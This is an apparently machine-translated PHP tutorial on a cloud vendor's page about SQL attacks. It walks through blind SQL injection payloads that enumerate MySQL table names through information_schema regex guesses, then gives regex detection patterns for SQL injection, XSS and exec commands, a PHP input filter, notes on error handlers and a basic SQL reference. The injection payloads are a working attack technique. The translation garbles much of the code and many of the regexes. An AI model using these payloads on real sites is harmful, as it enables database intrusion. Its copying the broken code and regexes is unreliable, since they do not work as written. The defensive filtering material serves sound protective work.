Common SQL attacks in php: Regular expression aggregation, SQL regular expression _ PHP Tutorial

Source: Internet
Author: User
Tags php regular expression
Regular expressions for common SQL attacks in php are summarized and SQL regular expressions are used. Regular expressions of common SQL attacks in php are summarized. This article describes the regular expressions of common SQL attacks in php. Share it with you for your reference. The specific analysis is as follows: a summary of common SQL attack regular expressions in php, and an SQL regular expression

This article describes the regular expressions of common SQL attacks in php. Share it with you for your reference. The specific analysis is as follows:

We all know that all database names and field names are stored in the information_schema database of MYSQL 5 +. The attack method is as follows:

1. determine whether the first character of the first table name is a character in a-z. blind_sqli is a known database name.
Note: in the regular expression, ^ [a-z] indicates that the starting character in the string is within the range of a-z.

The code is as follows:

Index. php? Id = 1 and 1 = (SELECT 1 FROM information_schema.tables WHERE TABLE_SCHEMA = "blind_sqli" AND table_name REGEXP '^ [a-z] 'limit 0, 1 )/*

2. determine whether the first character is a character in a-n.

The code is as follows:

Index. php? Id = 1 and 1 = (SELECT 1 FROM information_schema.tables WHERE TABLE_SCHEMA = "blind_sqli" AND table_name REGEXP '^ [a-n] 'limit 0, 1 )/*

3. confirm that the character is n

The code is as follows:

Index. php? Id = 1 and 1 = (SELECT 1 FROM information_schema.tables WHERE TABLE_SCHEMA = "blind_sqli" AND table_name REGEXP '^ n' LIMIT 0, 1 )/*

4. replace the expression as follows:

The code is as follows:

Expression like this: '^ n [a-z]'-> '^ ne [a-z]'-> '^ new [a-z]'-> '^ news [a-z] '-> FALSE


In this case, the table name is news. to verify whether the regular expression is '^ news $', you do not need to directly judge table_name = 'news.

5. then, you can guess other tables. you only need to modify limit-> limit to perform blind injection on the following tables.

For example:

The code is as follows:

$ Exec_Commond = "(\ s | \ S) * (exec (\ s | \ +) + (s | x) p \ w +) (\ s | \ S) *";
$ Simple_XSS = "(\ s | \ S) * (% 3C) | <) (% 2F) |/) * [a-z0-9 %] + (% 3E) |>) (\ s | \ S )*";
$ Eval_XSS = "(\ s | \ S) * (% 65) | e) (\ s) * (% 76) | v) (\ s) * (% 61) | a) (\ s) * (% 6C) | l) (\ s | \ S )*";
$ Image_XSS = "(\ s | \ S) * (% 3C) | <) (% 69) | I | I | (% 49) (% 6D) | m | M | (% 4D) (% 67) | g | G | (% 47) [^ \ n] + (% 3E) |>) (\ s | \ S )*";
$ Script_XSS = "(\ s | \ S) * (% 73) | s) (\ s) * (% 63) | c) (\ s) * (% 72) | r) (\ s) * (% 69) | I) (\ s) * (% 70) | p) (\ s) * (% 74) | t) (\ s | \ S )*";
$ SQL _Injection = "(\ s | \ S) * (% 27) | (') | (% 3D) | (=) | (/) | (% 2F) | (") | (% 22) | (-| % 2D) {2}) | (% 23) | (% 3B) | (;)) + (\ s | \ S )*";

SQL attack code:

The code is as follows:

<? Php
Function customError ($ errno, $ errstr, $ errfile, $ errline)
{
Echo"Error number:[$ Errno], error on line $ errline in $ errfile
";
Die ();
}
Set_error_handler ("customError", E_ERROR );
$ Getfilter = "'| (and | or) \ B. +? (>|<|=| In | like) |\/ \ *. +? \ * \/| <\ S * script \ B | \ bEXEC \ B | UNION. +? SELECT | UPDATE. +? SET | INSERT \ s + INTO. +? VALUES | (SELECT | DELETE). +? FROM | (CREATE | ALTER | DROP | TRUNCATE) \ s + (TABLE | DATABASE )";
$ Postfilter = "\ B (and | or) \ B. {1, 6 }? (= |> | <| \ Bin \ B | \ blike \ B) | \/\ *. +? \ * \/| <\ S * script \ B | \ bEXEC \ B | UNION. +? SELECT | UPDATE. +? SET | INSERT \ s + INTO. +? VALUES | (SELECT | DELETE). +? FROM | (CREATE | ALTER | DROP | TRUNCATE) \ s + (TABLE | DATABASE )";
$ Cookiefilter = "\ B (and | or) \ B. {1, 6 }? (= |> | <| \ Bin \ B | \ blike \ B) | \/\ *. +? \ * \/| <\ S * script \ B | \ bEXEC \ B | UNION. +? SELECT | UPDATE. +? SET | INSERT \ s + INTO. +? VALUES | (SELECT | DELETE). +? FROM | (CREATE | ALTER | DROP | TRUNCATE) \ s + (TABLE | DATABASE )";
Function StopAttack ($ StrFiltKey, $ StrFiltValue, $ ArrFiltReq)
{
If (is_array ($ StrFiltValue ))
{
$ StrFiltValue = implode ($ StrFiltValue );
}
If (preg_match ("/". $ ArrFiltReq. "/is", $ StrFiltValue) = 1 &&! Isset ($ _ REQUEST ['securitytoken'])
{
Slog ("

Operation IP address: ". $ _ SERVER [" REMOTE_ADDR "]."
Operation Time: ". strftime (" % Y-% m-% d % H: % M: % S ")."
Operation page: ". $ _ SERVER [" PHP_SELF "]."
Submission method: ". $ _ SERVER [" REQUEST_METHOD "]."
Parameter submitted: ". $ StrFiltKey ."
Submit data: ". $ StrFiltValue );
Print "result notice: Illegal operation! ";
Exit ();
}
}
Foreach ($ _ GET as $ key => $ value)
{
StopAttack ($ key, $ value, $ getfilter );
}
Foreach ($ _ POST as $ key => $ value)
{
StopAttack ($ key, $ value, $ postfilter );
}
Foreach ($ _ COOKIE as $ key => $ value)
{
StopAttack ($ key, $ value, $ cookiefilter );
}

Function slog ($ logs)
{
$ Toppath = "log.htm ";
$ Ts = fopen ($ toppath, "a + ");
Fputs ($ Ts, $ logs. "rn ");
Fclose ($ Ts );
}
?>


SQL analysis:

If you use this function, it bypasses PHP's standard error handling, so you have to define the error handling program (die ()).
Second, if an error occurs before the code is executed, the user-defined program is not executed at that time, so the error handling program written by the user will not be used.

In PHP, you can use set_error_handler () to handle PHP errors. you can also use the trigger_error () function to throw an error.

The set_error_handler () function sets the custom error handling function. The function is used to create the user's own error handling method during running. It needs to create an error handling function first, and then set the error level.
Usage:

The code is as follows:

Function customError ($ errno, $ errstr, $ errfile, $ errline)
{
Echo"Error code:[$ {Errno}] $ {errstr} \ r \ n ";
Echo "error code line: {$ errline} File {$ errfile} \ r \ n ";
Echo "PHP version", PHP_VERSION, "(", PHP_ OS, ") \ r \ n ";
// Die ();
}
Set_error_handler ("customError", E_ALL | E_STRICT );

Summary

When PHP encounters an error, it will give the location, number of rows, and cause of the error script. many people say that this is no big deal. However, the consequences of leaking the actual path are unimaginable. for some intruders, this information is very important. In fact, many servers have this problem. Some network administrators simply set display_errors in the PHP configuration file to Off, but I think this method is too negative. Sometimes, we do need PHP to return an error message for debugging. In addition, when an error occurs, you may need to give the user an explanation, or even navigate to another page. But with set_error_handler (), these contradictions can also be solved. However, this function is rarely used.

I hope this article will help you with PHP programming.


Php regular expression parsing SQL

$ SQL ='
Create table if not exists uploadtype (
Id int (11) not null AUTO_INCREMENT,
Title varchar (20) DEFAULT '0 ',
Sydefault char (1) DEFAULT '0 ',
Primary key (id)
) ENGINE = MyISAM
';
Preg_match ('# create table. * \ (. * \) ENGINE = MyISAM # isU', $ SQL, $ typefile );
Var_dump ($ typefile );

Common symbols of SQL regular expressions

SQL classification:
DDL-Data Definition Language (CREATE, ALTER, DROP, DECLARE)
DML-data manipulation language (SELECT, DELETE, UPDATE, INSERT)
DCL-Data Control Language (GRANT, REVOKE, COMMIT, ROLLBACK)

First, we will briefly introduce the basic statements:
1. description: create a database
Create database database-name
2. description: Delete a database.
Drop database dbname
3. description: back up SQL server
--- Create a device for the backup data
USE master
EXEC sp_addumpdevice 'disk', 'testback', 'C: \ mssql7backup \ MyNwind_1.dat'
--- Start backup
Backup database pubs TO testBack
4. description: create a new table.
Create table tabname (col1 type1 [not null] [primary key], col2 type2 [not null],...)
Create a new table based on an existing table:
A: create table tab_new like tab_old (use the old table to create A new table)
B: create table tab_new as select col1, col2... From tab_old definition only
5. description: delete the new table drop table tabname
6. description: add a column.
Alter table tabname add column col type
Note: columns cannot be deleted after they are added. After columns are added to DB2, the data type cannot be changed. the only change is to increase the length of the varchar type.
7. description: add a primary key: Alter table tabname add primary key (col)
Delete a primary key: Alter table tabname drop primary key (col)
8. description: create an index: create [unique] index idxname on tabname (col ....)
Delete index: drop index idxname
Note: The index cannot be changed. to change the index, you must delete it and recreate it.
9. description: create view viewname as select statement
Delete view: drop view viewname
10. description: several simple basic SQL statements
Select: select * from table1 where range
Insert: insert into table1 (field1, field2) values (value1, value2)
Delete: delete from table1 where range
Update: update table1 set field1 = value1 where range
Search: select * from table1 where field1 like '% value1 %' --- the like syntax is very subtle, query information!
Sort: select * from table1 order by field1, field2 [desc]
Total: select count (*) as totalcount from table1
Sum: select sum (field1) as sumvalue from table1
Average: select avg (field1) as avgvalue from table1
Maximum ...... remaining full text>
 

Examples in this article describes common SQL attack regular expressions in php. Share it with you for your reference. The specific analysis is as follows :...

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.